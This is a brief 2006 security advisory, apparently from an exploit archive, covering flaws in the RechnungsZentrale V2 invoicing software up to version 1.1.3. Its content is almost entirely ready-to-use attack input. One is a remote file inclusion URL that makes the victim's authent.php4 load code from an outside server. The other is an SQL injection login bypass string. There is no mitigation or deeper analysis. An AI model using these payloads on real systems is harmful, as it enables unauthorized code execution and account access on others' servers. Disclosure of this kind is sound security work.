id: 370
date: 04/18/2006
title: RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
author: GroundZero Security
cves: 

============================================================
RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability
============================================================





- GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -




#  0day.today [2023-03-23]  #